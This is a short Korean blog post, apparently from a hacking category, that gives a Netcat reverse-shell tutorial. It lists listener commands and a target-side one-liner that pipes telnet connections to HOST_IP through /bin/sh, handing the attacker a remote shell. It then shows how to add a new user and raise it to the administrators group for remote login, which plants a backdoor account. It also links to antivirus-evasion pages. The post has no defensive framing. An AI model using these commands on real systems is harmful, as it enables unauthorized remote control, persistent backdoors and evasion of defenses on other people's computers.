Netcat Reverse Shell
우선 두대의 PC가 필요하며 각 PC에는 Netcat이 필요하다
HOST PC에서 nc 를 cmd를 통해서 2개를 연 후
> nc -l -p 1111
> nc -l -p 2222
위와 같이 두개의 port를 오픈한다.
Target PC에선 nc 를 연 후
# telnet HOST_IP 1111 | /bin/sh | telnet HOST_IP 2222
이렇게 해주면 Host에서 port 1111로 오픈한 cmd 창을 통하여 명령어를 전달하면 port 2222를 통하여 결과값을 돌려 받을 수가 있다.
연결 후 'net user'라는 명령어를 사용하면 위 스크린샷 처럼 현재 시스템에 등록되어 있는 사용자를 보여준다. net user /add USER PASSWORD' 명령은 사용자를 시스템에 등록해준다. 예제로 1111의 비밀번호를 사용하는 test라는 사용자를 등록하였다.
그리고 'net localgroup administrators test /add'를 사용해서 test 사용자를 관리자 그룹으로 옮겨준다. 윈도우는 기본정책으로 관리자가 아니면 원격제어를 제한한다. 따라서 사용자를 관리자 그룹으로 만들어 주는 것이다. 관리자 그룹으로 이동시킨 사용자는 위 스크린샷 처럼 원격 로그인이 된다. 고유의 사용자를 만든 것이므로 사용자를 위한 여러 개인설정을 만든다.
백신우회
http://cdpython.tistory.com/22
http://0x191unauthorized.blogspot.kr/2011/08/antivirus-hiding.html
참고 사이트 및 출처
http://devanix.tistory.com/307
http://blog.daum.net/sysnet924/246
'Hacking > Network Hacking' 카테고리의 다른 글
WiFi Crack - WPA (0) | 2015.08.24 |
---|---|
WiFi Crack - WEP (0) | 2015.08.24 |
네트워크 해킹 순서 참고 사이트 (0) | 2015.08.20 |
Cain&Abel - ARP_Spoofing Attack (0) | 2015.03.23 |